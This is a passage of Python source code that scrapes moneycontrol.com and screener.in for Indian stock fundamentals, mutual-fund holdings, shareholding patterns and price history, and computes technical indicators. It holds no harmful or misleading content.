    """Children of a BeautifulSoup node, keeping every Tag plus any non-tag
    node whose text is non-empty after removing newlines and stripping."""
    kept = []
    for child in html_content.children:
        if type(child) == bs4.element.Tag:
            kept.append(child)
        elif len(str(child).replace("\n", "").strip()) > 0:
            kept.append(child)
    return kept
def get_portfolio(mfid):
    """Fetch a moneycontrol mutual-fund holdings page for `mfid` and return
    the (holdings <table> element, fund name) pair."""
    url = "https://www.moneycontrol.com/india/mutualfunds/mfinfo/portfolio_holdings/" + mfid
    response = requests.get(url, timeout=240)
    soup = BeautifulSoup(response.content, "html.parser")
    holdings_table = soup.find('table', attrs={'class': 'tblporhd'})
    fund_name = soup.find('h1').text
    return holdings_table, fund_name
def get_table(portfolio_table):
    """Parse a holdings table into rows of cell descriptors.

    Each cell becomes a dict with 'text' (stripped, newlines removed) and,
    when the cell's first child is a link, an 'href' entry. Cells whose text
    is empty are skipped entirely."""
    parsed_rows = []
    for row in get_children(portfolio_table):
        parsed_cells = []
        for cell in get_children(row):
            cell_text = cell.text.strip().replace("\n", "")
            if len(cell_text) == 0:
                continue
            descriptor = {'text': cell_text}
            cell_children = get_children(cell)
            if len(cell_children) > 0 and cell_children[0].has_attr('href'):
                descriptor['href'] = cell_children[0]['href']
            parsed_cells.append(descriptor)
        parsed_rows.append(parsed_cells)
    return parsed_rows
def get_table_simple(portfolio_table, is_table_tag=True):
    """Parse a table into a list of rows of cleaned cell texts.

    When `is_table_tag`, rows are located with find_all('tr'); otherwise the
    node's direct children are treated as rows. Cell text is stripped, has
    newlines removed and runs of spaces collapsed; empty cells are dropped."""
    rows = portfolio_table.find_all('tr') if is_table_tag else get_children(portfolio_table)
    parsed = []
    for row in rows:
        texts = []
        for cell in get_children(row):
            cell_text = cell.text.strip().replace("\n", "")
            cell_text = remove_multiple_spaces(cell_text)
            if cell_text:
                texts.append(cell_text)
        parsed.append(texts)
    return parsed
def get_inner_texts_as_array(elem, filter_empty=True):
    """Return the text of each child of `elem` (stripped, newlines removed);
    when `filter_empty`, empty strings are dropped from the result."""
    texts = [child.text.strip().replace("\n", "") for child in get_children(elem)]
    if filter_empty:
        texts = [t for t in texts if t is not None and len(t) > 0]
    return texts
def get_shareholding_pattern(shareholding_url):
    """Scrape a moneycontrol shareholding-pattern page.

    Returns promoter/public holding percentages, promoter pledging, total
    share count and total pledging, or {} when fewer than three tables are
    present. Cell positions follow moneycontrol's fixed page layout.
    """
    page_response = requests.get(shareholding_url, timeout=240)
    page_content = BeautifulSoup(page_response.content, "html.parser")
    tables = page_content.find_all('table')
    if len(tables) < 3:
        return {}
    # The third table on the page holds the shareholding breakdown.
    table_content = page_content.find_all('table')[2]
    rows = table_content.find_all('tr')
    all_tds = page_content.find_all('td')
    # Anchor on the grand-total cell so fixed offsets below can address cells.
    idx = list(map(lambda x: x.text, all_tds)).index("Total (A)+(B)+(C)")
    promoters = get_inner_texts_as_array(
        list(filter(lambda x: "Total shareholding of Promoter and Promoter Group (A)" in x.text, rows))[0],
        filter_empty=False)
    public = get_inner_texts_as_array(list(filter(lambda x: "Total Public shareholding (B)" in x.text, rows))[0],
                                      filter_empty=False)
    all_shares = get_inner_texts_as_array(
        list(filter(lambda x: "Total (A)+(B)+(C)" in x.text, page_content.find_all('tr')))[0], filter_empty=False)
    # Fixed cell offsets within a row: [5] = % of total shares, [7] = % pledged.
    promoters_pledging = ffloat(promoters[7])
    promoters = ffloat(promoters[5])
    public = ffloat(public[5])
    # Offsets from the grand-total cell: +2 = share count, +7 = pledged shares.
    total_shares_count = ffloat(all_tds[idx + 2].text)
    total_pledging = ffloat(all_tds[idx + 7].text)
    return {"promoters": promoters, "public": public, "promoters_pledging": promoters_pledging,
            "total_shares_count": total_shares_count, "total_pledging": total_pledging}
def get_fundholding_pattern(fundholding_url):
    """Scrape a moneycontrol mutual-fund-holding page for one stock.

    Extracted fields:
    - mf_holding: True when the page says no fund held the stock recently
      (NOTE(review): the flag name reads inverted vs. the page text — it is
      set True on "Not held by Mutual Funds ..."; confirm downstream usage)
    - mf_bought / mf_sold / mf_hold: counts of funds that bought / sold /
      kept their position last quarter (NaN when absent)
    - mf_share_count, mf_share_count_last_quarter_change,
      mf_six_quarter_share_count: share counts from the six-quarter table.
    """
    page_response = requests.get(fundholding_url, timeout=240)
    page_content = BeautifulSoup(page_response.content, "html.parser")
    results = {}
    top_tab = page_content.text
    # print(top_tab)
    if "Not held by Mutual Funds in the last 6 quarters" in top_tab:
        results['mf_holding'] = True
    else:
        results['mf_holding'] = False
    bought = np.nan
    sold = np.nan
    hold = np.nan
    if not results['mf_holding']:
        # The counts are embedded in free text: "... Bought by N funds ..."
        bl = top_tab.split("Bought by")
        if len(bl) == 2:
            bought = ffloat(bl[1].strip().split(" ")[0])
        sl = top_tab.split("Sold by")
        if len(sl) == 2:
            sold = ffloat(sl[1].strip().split(" ")[0])
        hl = top_tab.split("No change in")
        if len(hl) == 2:
            hold = ffloat(hl[1].strip().split(" ")[0])
    results['mf_bought'] = bought
    results['mf_sold'] = sold
    results['mf_hold'] = hold
    # Last row of the six-quarter table holds the share counts per quarter.
    six_quarter = page_content.find('div', attrs={'id': 'div_0'}).find('table', attrs={'class': 'tblfund2'}).find_all('tr')[-1]
    six_quarter = ffloat_list(get_inner_texts_as_array(six_quarter)[1:])
    results['mf_share_count'] = six_quarter[0]
    results['mf_share_count_last_quarter_change'] = six_quarter[0] - six_quarter[1]
    results['mf_six_quarter_share_count'] = six_quarter
    return results
def get_ratios(url):
    """Scrape a moneycontrol financial-ratios page into a dict of series.

    Returns {} when the page shows "Data Not Available"; otherwise a dict
    with normalized keys (ratios_dates, ratios_diluted_eps, ...), each mapped
    to a list of floats per reporting date (empty list when the row is
    missing from the page).
    """
    page_response = requests.get(url, timeout=240)
    page_content = BeautifulSoup(page_response.content, "html.parser")
    # The last 'table4' table on the page holds the ratio rows.
    table_content = page_content.find_all('table', attrs={'class': 'table4'})[-1]
    if "Data Not Available" in table_content.text:
        return {}
    # Fixed nesting (per moneycontrol layout): child [1] holds the date row,
    # child [2] holds the ratio rows (first entry is a header and is skipped).
    dates_html = get_children(get_children(get_children(table_content)[0])[1])[1]
    dates = get_inner_texts_as_array(dates_html)
    ratios_htmls = get_children(get_children(get_children(get_children(table_content)[0])[1])[2])[1:]
    rows = list(map(get_inner_texts_as_array, ratios_htmls))
    ratios = {}
    ratios['dates'] = dates
    for row in rows:
        if len(row) > 1:
            ratios[row[0]] = ffloat_list(row[1:])
    # Map page row labels to stable output keys; absent rows become [].
    needed_keys = [('dates', 'ratios_dates'),
                   ('Diluted EPS (Rs.)', 'ratios_diluted_eps'),
                   ('Revenue from Operations/Share (Rs.)', 'ratios_revenue_per_share'),
                   ('PBT/Share (Rs.)', 'ratios_pbt_per_share'),
                   ('PBT Margin (%)', 'ratios_pbt_margin_per_share'),
                   ('Total Debt/Equity (X)', 'ratios_de'),
                   ('Asset Turnover Ratio (%)', 'ratios_asset_turnover_ratio'),
                   ('Current Ratio (X)', 'ratios_cr'),
                   ('EV/EBITDA (X)', 'ratios_ev_by_ebitda'),
                   ('Price/BV (X)', 'ratios_pb'),
                   ('MarketCap/Net Operating Revenue (X)','mcap/revenue'),
                   ('Price/Net Operating Revenue','price/revenue')]
    ratios = {your_key[1]: ratios[your_key[0]] if your_key[0] in ratios else [] for your_key in needed_keys}
    return ratios
def get_min_and_three_year_from_screener(table):
    """From a screener growth table (rows of [label, 'x%']), return
    (minimum growth across all two-cell rows, the '3 Years:' growth).
    Either value stays +inf when no matching row exists."""
    min_value = np.inf
    three_year_value = np.inf
    for row in table:
        if len(row) != 2:
            continue
        value = ffloat(row[1].replace('%', ''))
        if row[0] == '3 Years:':
            three_year_value = value
        min_value = min(min_value, value)
    return min_value, three_year_value
def get_quarterly_results(quarterly_results_table):
    """Parse a quarterly-results HTML table into a dict of numeric series.

    Row indices follow the page's fixed layout: 0 = dates, 1 = sales,
    3 = operating profit, 4 = OPM %, 7 = interest, 8 = PBT.
    """
    qrt = get_table_simple(quarterly_results_table)
    qres = {}
    qres['dates'] = qrt[0]
    qres['sales'] = ffloat_list(qrt[1][1:])
    qres['operating_profit'] = ffloat_list(qrt[3][1:])
    qres['opm_percent'] = ffloat_list(qrt[4][1:])
    qres['interest'] = ffloat_list(qrt[7][1:])
    qres['pbt'] = ffloat_list(qrt[8][1:])
    return qres
def get_annual_results(annual_results):
    """Parse an annual-results HTML table into a dict of numeric series;
    returns {} when the table is missing.

    Row indices follow the page's fixed layout: 0 = dates, 1 = sales,
    3 = operating profit, 4 = OPM %, 6 = interest, 8 = PBT, 11 = EPS.
    """
    if annual_results is None:
        return {}
    qrt = get_table_simple(annual_results)
    qres = {}
    qres['dates'] = qrt[0]
    qres['sales'] = ffloat_list(qrt[1][1:])
    qres['operating_profit'] = ffloat_list(qrt[3][1:])
    qres['opm_percent'] = ffloat_list(qrt[4][1:])
    qres['interest'] = ffloat_list(qrt[6][1:])
    qres['pbt'] = ffloat_list(qrt[8][1:])
    qres['eps'] = ffloat_list(qrt[11][1:])
    return qres
def get_balance_sheet(balance_sheet):
    """Parse a balance-sheet HTML table into a dict of numeric series;
    returns {} when the table is missing.

    Row indices follow the page's fixed layout: 0 = dates, 3 = borrowings,
    6 = fixed assets, 10 = total assets.
    """
    if balance_sheet is None:
        return {}
    qrt = get_table_simple(balance_sheet)
    qres = {}
    qres['dates'] = qrt[0]
    qres['borrowings'] = ffloat_list(qrt[3][1:])
    qres['fixed_assets'] = ffloat_list(qrt[6][1:])
    qres['total_assets'] = ffloat_list(qrt[10][1:])
    return qres
def get_cash_flows(cash_flows):
    """Parse a cash-flow HTML table into a dict of numeric series; returns {}
    when the table is missing. Row 0 = dates, row 4 = net cash flow."""
    if cash_flows is None:
        return {}
    qrt = get_table_simple(cash_flows)
    qres = {}
    qres['dates'] = qrt[0]
    qres['net_cash_flow'] = ffloat_list(qrt[4][1:])
    return qres
def get_past_prices(sc_id):
    """Download BSE and NSE historical OHLCV CSVs for a scrip, compute
    technical-indicator columns, and pick reference rows ~1/2/3/5 years back.

    Returns a dict with the enriched price frame ('all_past_prices', the
    longer of the two exchanges' histories) plus the anchor rows
    'last_year', 'two_year_ago', 'three_year_ago', 'five_year_ago' (None when
    no trading day is found within 12 days after the target date).
    """
    bse_url = "https://www.moneycontrol.com/tech_charts/bse/his/%s.csv" % sc_id
    nse_url = "https://www.moneycontrol.com/tech_charts/nse/his/%s.csv" % sc_id
    past_prices_nse = pd.read_csv(nse_url, header=None, names=['open', 'high', 'low', 'close', 'volume', 1, 2, 3, 4])[
        ['open', 'high', 'low', 'close', 'volume']]
    past_prices_nse.index = pd.to_datetime(past_prices_nse.index)
    past_prices_bse = pd.read_csv(bse_url, header=None, names=['open', 'high', 'low', 'close', 'volume', 1, 2, 3, 4])[
        ['open', 'high', 'low', 'close', 'volume']]
    past_prices_bse.index = pd.to_datetime(past_prices_bse.index)
    ly = None
    two_year_ago = None
    three_year_ago = None
    five_year_ago = None
    # Try BSE first: scan up to 12 calendar days past each anchor date so a
    # weekend/holiday target still lands on a trading day. Missing dates
    # raise inside .loc and are swallowed so the next offset can be tried.
    past_prices = past_prices_bse
    for i in range(12):
        try:
            if ly is None:
                ly_t = pd.to_datetime(past_prices.iloc[-1:].index.values[0] - pd.to_timedelta(364 + i, unit='d'))
                ly = past_prices.loc[[ly_t]]
            if two_year_ago is None:
                two_year_ago_t = pd.to_datetime(
                    past_prices.iloc[-1:].index.values[0] - pd.to_timedelta(730 + i, unit='d'))
                two_year_ago = past_prices.loc[[two_year_ago_t]]
            if three_year_ago is None:
                three_year_ago_t = pd.to_datetime(
                    past_prices.iloc[-1:].index.values[0] - pd.to_timedelta(1095 + i, unit='d'))
                three_year_ago = past_prices.loc[[three_year_ago_t]]
            if five_year_ago is None:
                five_year_ago_t = pd.to_datetime(
                    past_prices.iloc[-1:].index.values[0] - pd.to_timedelta(1825 + i, unit='d'))
                five_year_ago = past_prices.loc[[five_year_ago_t]]
        except Exception as e:
            pass
    # Same scan against NSE for whichever anchors BSE could not fill.
    past_prices = past_prices_nse
    for i in range(12):
        try:
            if ly is None:
                ly_t = pd.to_datetime(past_prices.iloc[-1:].index.values[0] - pd.to_timedelta(364 + i, unit='d'))
                ly = past_prices.loc[[ly_t]]
            if two_year_ago is None:
                two_year_ago_t = pd.to_datetime(
                    past_prices.iloc[-1:].index.values[0] - pd.to_timedelta(730 + i, unit='d'))
                two_year_ago = past_prices.loc[[two_year_ago_t]]
            if three_year_ago is None:
                three_year_ago_t = pd.to_datetime(
                    past_prices.iloc[-1:].index.values[0] - pd.to_timedelta(1095 + i, unit='d'))
                three_year_ago = past_prices.loc[[three_year_ago_t]]
            if five_year_ago is None:
                five_year_ago_t = pd.to_datetime(
                    past_prices.iloc[-1:].index.values[0] - pd.to_timedelta(1825 + i, unit='d'))
                five_year_ago = past_prices.loc[[five_year_ago_t]]
        except Exception as e:
            pass
    # Keep whichever exchange has the longer history for feature building.
    if len(past_prices_nse) >= len(past_prices_bse):
        past_prices = past_prices_nse
    else:
        past_prices = past_prices_bse
    # stockstats wraps the frame and materializes indicator columns on access.
    stock = StockDataFrame.retype(past_prices)
    past_prices['rsi_15'] = stock['rsi_15']
    past_prices['rsi_45'] = stock['rsi_45']
    past_prices['rsi_75'] = stock['rsi_75']
    past_prices['rsi_130'] = stock['rsi_130']
    past_prices['boll_ub'] = stock['boll_ub']
    past_prices['boll_lb'] = stock['boll_lb']
    # Relative distance of the close from the Bollinger bands.
    past_prices['boll_ub_gap'] = (past_prices['boll_lb'] - past_prices['close']) / past_prices['boll_lb']
    past_prices['boll_lb_gap'] = (past_prices['close'] - past_prices['boll_ub']) / past_prices['boll_ub']
    # Rolling relative price changes over ~1w/1m/3m/6m trading windows.
    past_prices["weekly_change"] = past_prices[["close"]].rolling(6).agg({"close": lambda x: (x[-1] - x[0]) / x[0]})
    past_prices["monthly_change"] = past_prices[["close"]].rolling(21).agg({"close": lambda x: (x[-1] - x[0]) / x[0]})
    past_prices["3m_change"] = past_prices[["close"]].rolling(65).agg({"close": lambda x: (x[-1] - x[0]) / x[0]})
    past_prices["6m_change"] = past_prices[["close"]].rolling(130).agg({"close": lambda x: (x[-1] - x[0]) / x[0]})
    # EWMA levels, deviations from them, and EWM stds for close and volume.
    past_prices["ewm_7_close"] = past_prices['close'].ewm(span=7).mean()
    past_prices["ewm_30_close"] = past_prices['close'].ewm(span=30).mean()
    past_prices["ewm_120_close"] = past_prices['close'].ewm(span=120).mean()
    past_prices["ewm_7_close_diff"] = (past_prices['close'] - past_prices["ewm_7_close"]) / past_prices["ewm_7_close"]
    past_prices["ewm_30_close_diff"] = (past_prices['close'] - past_prices["ewm_30_close"]) / past_prices["ewm_30_close"]
    past_prices["ewm_120_close_diff"] = (past_prices['close'] - past_prices["ewm_120_close"]) / past_prices["ewm_120_close"]
    past_prices["std_7_close"] = past_prices['close'].ewm(span=7).std()
    past_prices["std_30_close"] = past_prices['close'].ewm(span=30).std()
    past_prices["std_120_close"] = past_prices['close'].ewm(span=120).std()
    past_prices["ewm_7_volume"] = past_prices['volume'].ewm(span=7).mean()
    past_prices["ewm_30_volume"] = past_prices['volume'].ewm(span=30).mean()
    past_prices["ewm_120_volume"] = past_prices['volume'].ewm(span=120).mean()
    past_prices["ewm_7_volume_diff"] = (past_prices['volume'] - past_prices["ewm_7_volume"]) / past_prices["ewm_7_volume"]
    past_prices["ewm_30_volume_diff"] = (past_prices['volume'] - past_prices["ewm_30_volume"]) / past_prices["ewm_30_volume"]
    past_prices["ewm_120_volume_diff"] = (past_prices['volume'] - past_prices["ewm_120_volume"]) / past_prices["ewm_120_volume"]
    past_prices["std_7_volume"] = past_prices['volume'].ewm(span=7).std()
    past_prices["std_30_volume"] = past_prices['volume'].ewm(span=30).std()
    past_prices["std_120_volume"] = past_prices['volume'].ewm(span=120).std()
    past_prices.fillna(0, inplace=True)
    # Drop stockstats' intermediate helper columns if present.
    df_utils.drop_columns_safely(past_prices, ["close_-1_d", 'close_-1_s', 'rs_45', 'rs_15', 'close_20_sma', 'close_20_mstd',
                                               'boll'], inplace=True)
    res = {"all_past_prices": past_prices, "last_year": ly, "two_year_ago": two_year_ago,
           "three_year_ago": three_year_ago, "five_year_ago": five_year_ago}
    return res
def get_scrip_info(url):
    """Scrape a full equity profile for one moneycontrol.com stock page.

    Combines moneycontrol data (live price, valuation table, ratios, fund and
    shareholder holdings, historic prices) with screener.in data (growth/ROE
    ranges, quarterly/annual results, balance sheet, cash flows) into one flat
    dict keyed by snake_case field names.

    :param url: moneycontrol stock-page URL, absolute or a path starting "/".
    :return: dict of scraped fields. Never raises: on any problem the dict has
             ``failure=True`` plus an ``err`` message instead.
    """
    original_url = url
    key_val_pairs = {}
    key_val_pairs["original_url"] = original_url
    if not url.startswith("http"):
        url = "https://www.moneycontrol.com" + url
    try:
        page_response = requests.get(url, timeout=240)
        if page_response.status_code > 299:
            print("Failed to fetch: %s" % url)
            # single blind retry before parsing whatever came back
            page_response = requests.get(url, timeout=240)
        page_content = BeautifulSoup(page_response.content, "html.parser")
        # --- resolve the NSE ticker symbol from the page header --------------
        scrip_name = None
        name_divs = page_content.find_all('div', attrs={'class': 'gry10'})
        for nd in name_divs:
            texts = list(map(lambda x: x.strip(), nd.text.split(" ")))
            if "NSE:" in texts:
                scrip_name = texts[texts.index("NSE:") + 1]
                scrip_name = re.sub('[^0-9a-zA-Z&\-]+', '', scrip_name)
        # ETFs and BSE-only scrips are deliberately skipped
        if scrip_name is None or len(scrip_name.strip()) == 0 or "ETF" in scrip_name:
            key_val_pairs['failure'] = True
            key_val_pairs['err'] = "%s is not named on NSE" % url
            # print(key_val_pairs['err'])
            return key_val_pairs
        content_div_text = page_content.find('div', attrs={'id': 'content_full'}).text
        if "not listed" in content_div_text or "not traded" in content_div_text:
            key_val_pairs['failure'] = True
            key_val_pairs['err'] = "%s is not listed on both BSE and NSE" % url
            # print(key_val_pairs['err'])
            return key_val_pairs
        # --- live NSE quote ---------------------------------------------------
        price = ffloat(page_content.find('div', attrs={'id': 'Nse_Prc_tick_div'}).text.split(" ")[0].replace(',', ''))
        low = ffloat(page_content.find('span', attrs={'id': 'b_low_sh'}).text.split(" ")[0])
        high = ffloat(page_content.find('span', attrs={'id': 'b_high_sh'}).text.split(" ")[0])
        open_price = ffloat(page_content.find('div', attrs={'id': 'n_open'}).text.split(" ")[0].replace(',', ''))
        today_change = page_content.find('div', attrs={'id': 'n_changetext'}).text.strip().split(" ")
        today_change_value = ffloat(today_change[0])
        today_change_percent = ffloat(today_change[1])
        name = page_content.find('h1', attrs={'class': 'company_name'}).text
        # --- companion screener.in page (keyed by the NSE symbol) ------------
        screener_url = "https://www.screener.in/company/%s/" % scrip_name
        screener_page_response = requests.get(screener_url, timeout=240)
        if screener_page_response.status_code > 299:
            key_val_pairs['failure'] = True
            key_val_pairs['err'] = "No Screener URL: %s" % screener_url
            # print(key_val_pairs['err'])
            return key_val_pairs
        screener_page_content = BeautifulSoup(screener_page_response.content, "html.parser")
        screener_name = \
            get_children(get_children(screener_page_content.find('nav', attrs={'id': 'fixed-scroll-aid-bar'}))[0])[
                0].text.strip()
        sector = get_children(screener_page_content.find('h1'))[0].text.replace("/", '').strip()
        yearly_high = page_content.find('span', attrs={'id': 'n_52high'}).text.strip()
        yearly_low = page_content.find('span', attrs={'id': 'n_52low'}).text.strip()
        # valuation tables: standalone figures live in 'mktdet_1'
        html_data_content = page_content.find('div', attrs={'id': 'mktdet_1'})
        petable = get_table(get_children(html_data_content)[0])
        pbtable = get_table(get_children(html_data_content)[1])
        # daily-moving-average table (30/50/150/200 DMA rows)
        dma_table = get_table_simple(page_content.find('div', attrs={'id': 'acc_hd2'}).find_all('table')[2])
        # print(dma_table)
        thirty_dma = None
        fifty_dma = None
        one_fifty_dma = None
        two_hundred_dma = None
        if len(dma_table[1]) > 1:
            thirty_dma = dma_table[1][1]
        if len(dma_table[2]) > 1:
            fifty_dma = dma_table[2][1]
        if len(dma_table[3]) > 1:
            one_fifty_dma = dma_table[3][1]
        if len(dma_table[4]) > 1:
            two_hundred_dma = dma_table[4][1]
        # side navigation carries links to the ratios and shareholding pages;
        # the [2]/[7] and [4]/[0] indices are positional in moneycontrol's menu
        side_nav = page_content.find('dl', attrs={'id': 'slider'})
        ratio_url = side_nav.find_all('dd')[2].find_all('a')[7]['href']
        ratio_url = "https://www.moneycontrol.com" + ratio_url
        ratios = get_ratios(ratio_url)
        volume = ffloat(page_content.find('span', attrs={'id': 'nse_volume'}).text)
        # internal security id used by the fund-holding endpoint
        sc_id = page_content.find('input', attrs={'id': 'sc_id'}).get('value').lower()
        mf_url = "https://www.moneycontrol.com/mf/user_scheme/mfholddetail_sec.php?sc_did=%s" % sc_id
        shareholding_url = "https://www.moneycontrol.com" + side_nav.find_all('dd')[4].find_all('a')[0]['href']
        shareholdings = get_shareholding_pattern(shareholding_url)
        mfs = get_fundholding_pattern(mf_url)
        key_val_pairs = {**key_val_pairs, **mfs, **shareholdings, **ratios}
        # --- historic prices and point-in-time gains -------------------------
        past_prices = get_past_prices(sc_id)
        l_yp = None
        two_yp = None
        three_yp = None
        five_yp = None
        gain_loss_l_yp = None
        gain_loss_two_yp = None
        gain_loss_three_yp = None
        gain_loss_five_yp = None
        if is_dataframe(past_prices['last_year']):
            l_yp = past_prices['last_year']['close'].values[0]
            gain_loss_l_yp = (price - l_yp) * 100 / l_yp
        if is_dataframe(past_prices['two_year_ago']):
            two_yp = past_prices['two_year_ago']['close'].values[0]
            gain_loss_two_yp = (price - two_yp) * 100 / two_yp
        if is_dataframe(past_prices['three_year_ago']):
            three_yp = past_prices['three_year_ago']['close'].values[0]
            gain_loss_three_yp = (price - three_yp) * 100 / three_yp
        if is_dataframe(past_prices['five_year_ago']):
            five_yp = past_prices['five_year_ago']['close'].values[0]
            gain_loss_five_yp = (price - five_yp) * 100 / five_yp
        # --- screener.in financial statements --------------------------------
        quarterly_results = get_quarterly_results(
            screener_page_content.find('section', attrs={'id': 'quarters'}).find('table'))
        annual_results_table = screener_page_content.find('section', attrs={'id': 'profit-loss'}).find('table', attrs={
            'class': 'data-table'})
        annual_results = None
        if annual_results_table is not None:
            annual_results = get_annual_results(annual_results_table)
        # ranges-tables appear in order: sales growth, profit growth, ROE
        csg_table = get_table_simple(
            screener_page_content.find('section', attrs={'id': 'profit-loss'}).find_all('table', attrs={
                'class': 'ranges-table'})[0])
        min_csg, three_year_csg = get_min_and_three_year_from_screener(csg_table)
        cpg_table = get_table_simple(
            screener_page_content.find('section', attrs={'id': 'profit-loss'}).find_all('table', attrs={
                'class': 'ranges-table'})[1])
        min_cpg, three_year_cpg = get_min_and_three_year_from_screener(cpg_table)
        roe_table = get_table_simple(
            screener_page_content.find('section', attrs={'id': 'profit-loss'}).find_all('table', attrs={
                'class': 'ranges-table'})[2])
        min_roe, three_year_roe = get_min_and_three_year_from_screener(roe_table)
        balance_sheet = get_balance_sheet(
            screener_page_content.find('section', attrs={'id': 'balance-sheet'}).find('table'))
        cash_flows = get_cash_flows(screener_page_content.find('section', attrs={'id': 'cash-flow'}).find('table'))
        # --- merge standalone + consolidated valuation tables ----------------
        data_table = list()
        data_table.extend(petable)
        data_table.extend(pbtable)
        consolidated_html_data_content = page_content.find('div', attrs={'id': 'mktdet_2'})
        consolidated_petable = get_table(get_children(consolidated_html_data_content)[0])
        consolidated_pbtable = get_table(get_children(consolidated_html_data_content)[1])
        consolidated_data_table = list()
        consolidated_data_table.extend(consolidated_petable)
        consolidated_data_table.extend(consolidated_pbtable)
        for row in consolidated_data_table:
            k = row[0]['text']
            if len(row) < 2:
                v = None
            else:
                v = row[1]['text'].split(" ")[0].replace(',', '')
            key_val_pairs[k] = v
        # standalone values only fill gaps the consolidated table left unparseable
        for row in data_table:
            k = row[0]['text']
            if len(row) < 2:
                v = None
            else:
                v = row[1]['text'].split(" ")[0].replace(',', '')
            if k not in key_val_pairs or not isfloat(key_val_pairs[k]):
                key_val_pairs[k] = v
        # --- normalize the raw display labels into snake_case numeric fields --
        key_val_pairs["pe"] = ffloat(key_val_pairs.pop('P/E'))
        key_val_pairs["book_value"] = ffloat(key_val_pairs.pop('BOOK VALUE (Rs)'))
        key_val_pairs["deliverables"] = ffloat(key_val_pairs.pop('DELIVERABLES (%)'))
        key_val_pairs["eps"] = ffloat(key_val_pairs.pop('EPS (TTM)'))
        key_val_pairs["industry_pe"] = ffloat(key_val_pairs.pop('INDUSTRY P/E'))
        if 'MARKET CAP (Rs Cr)' in key_val_pairs:
            key_val_pairs["market_cap"] = key_val_pairs.pop('MARKET CAP (Rs Cr)')
        elif '**MARKET CAP (Rs Cr)' in key_val_pairs:
            key_val_pairs["market_cap"] = key_val_pairs.pop('**MARKET CAP (Rs Cr)')
        key_val_pairs["market_cap"] = ffloat(key_val_pairs["market_cap"])
        key_val_pairs["pb"] = ffloat(key_val_pairs.pop('PRICE/BOOK'))
        key_val_pairs["pc"] = ffloat(key_val_pairs.pop('P/C'))
        key_val_pairs['price'] = ffloat(price)
        key_val_pairs['today_change_value'] = today_change_value
        key_val_pairs['today_change_percent'] = today_change_percent
        key_val_pairs['low'] = low
        key_val_pairs['high'] = high
        key_val_pairs['open'] = open_price
        key_val_pairs['volume'] = volume
        key_val_pairs["name"] = name
        key_val_pairs["scrip_name"] = scrip_name
        key_val_pairs["yearly_low"] = ffloat(yearly_low)
        key_val_pairs["yearly_high"] = ffloat(yearly_high)
        key_val_pairs["min_csg"] = min_csg
        key_val_pairs["three_year_csg"] = three_year_csg
        key_val_pairs["min_cpg"] = min_cpg
        key_val_pairs["three_year_cpg"] = three_year_cpg
        key_val_pairs["min_roe"] = min_roe
        key_val_pairs["three_year_roe"] = three_year_roe
        # PEG falls back to minimum profit growth when the 3-year figure is NaN
        key_val_pairs["peg"] = ffloat(key_val_pairs["pe"]) / three_year_cpg
        if np.isnan(three_year_cpg):
            key_val_pairs["peg"] = ffloat(key_val_pairs["pe"]) / min_cpg
        key_val_pairs["min_recovery_year"] = get_year_when_cumulative_profit_over_pe(ffloat(key_val_pairs["pe"]),
                                                                                     three_year_cpg)
        key_val_pairs['sector'] = sector
        key_val_pairs['thirty_dma'] = ffloat(thirty_dma)
        key_val_pairs['fifty_dma'] = ffloat(fifty_dma)
        key_val_pairs['one_fifty_dma'] = ffloat(one_fifty_dma)
        key_val_pairs['two_hundred_dma'] = ffloat(two_hundred_dma)
        key_val_pairs['l_yp'] = l_yp
        key_val_pairs['two_yp'] = two_yp
        key_val_pairs['three_yp'] = three_yp
        key_val_pairs['five_yp'] = five_yp
        key_val_pairs['gain_loss_l_yp'] = gain_loss_l_yp
        key_val_pairs['gain_loss_two_yp'] = gain_loss_two_yp
        key_val_pairs['gain_loss_three_yp'] = gain_loss_three_yp
        key_val_pairs['gain_loss_five_yp'] = gain_loss_five_yp
        key_val_pairs['de'] = np.nan
        key_val_pairs['ev_by_ebitda'] = np.nan
        # ratios_* series come newest-first; take the latest value when present
        if "ratios_ev_by_ebitda" in key_val_pairs and len(key_val_pairs["ratios_ev_by_ebitda"]) > 0:
            key_val_pairs['ev_by_ebitda'] = key_val_pairs["ratios_ev_by_ebitda"][0]
        if "ratios_de" in key_val_pairs and len(key_val_pairs["ratios_de"]) > 0:
            key_val_pairs['de'] = key_val_pairs["ratios_de"][0]
        key_val_pairs['quarterly_results'] = quarterly_results
        key_val_pairs['annual_results'] = annual_results
        key_val_pairs['balance_sheet'] = balance_sheet
        key_val_pairs['cash_flows'] = cash_flows
        key_val_pairs['past_prices'] = past_prices
        key_val_pairs['failure'] = False
        # drop raw display keys nobody downstream consumes
        del key_val_pairs['DIV (%)']
        del key_val_pairs['DIV YIELD.(%)']
        del key_val_pairs['FACE VALUE (Rs)']
        del key_val_pairs['Market Lot']
    except Exception as e:
        # raise e
        traceback.print_exc()
        key_val_pairs['failure'] = True
        key_val_pairs['err'] = "Error for: %s" % original_url
        print(key_val_pairs['err'])
        return key_val_pairs
    return key_val_pairs
def get_scrip_info_by_nse_name(nse_name):
    """Resolve an NSE symbol to its moneycontrol page via the autosuggest API
    and scrape it with :func:`get_scrip_info`.

    When several suggestions come back, the one whose NSE symbol (embedded in
    the suggestion's display HTML) matches ``nse_name`` exactly is chosen.
    """
    url = "https://www.moneycontrol.com/mccode/common/autosuggesion.php?classic=true&query=%s&type=1&format=json" % nse_name
    response = requests.get(url, timeout=240)
    suggestions = json.loads(response.text)
    if len(suggestions) > 1:
        display_names = pd.DataFrame.from_records(suggestions)["pdt_dis_nm"].values
        # each display name is HTML like "<span>Company, SYMBOL</span>"
        symbols = [BeautifulSoup(dn, "html.parser").find("span").text.split(",")[1].strip()
                   for dn in display_names]
        scrip_url = suggestions[symbols.index(nse_name)]['link_src']
    else:
        scrip_url = suggestions[0]['link_src']
    return get_scrip_info(scrip_url)
def get_all_company_from_mf(mfid, threadpool_size=8):
    """Scrape full details for every company held by the mutual fund ``mfid``.

    Returns a dict keyed by NSE scrip name; holdings that failed to scrape are
    reported on stdout and excluded.
    """
    portfolio_table, fund_name = get_portfolio(mfid=mfid)
    holding_rows = get_table(portfolio_table)[1:]  # drop the header row
    scrip_col = 0
    holding_links = [row[scrip_col]['href'] for row in holding_rows]
    workers = ThreadPool(threadpool_size)
    details = [d for d in workers.map(get_scrip_info, holding_links) if d is not None]
    fetched = len(details)
    failed = [d for d in details if d['failure']]
    details = [d for d in details if not d['failure']]
    print("Scrips which failed to fetch = %s" % (fetched - len(details)))
    print(failed)
    return {detail['scrip_name']: detail for detail in details}
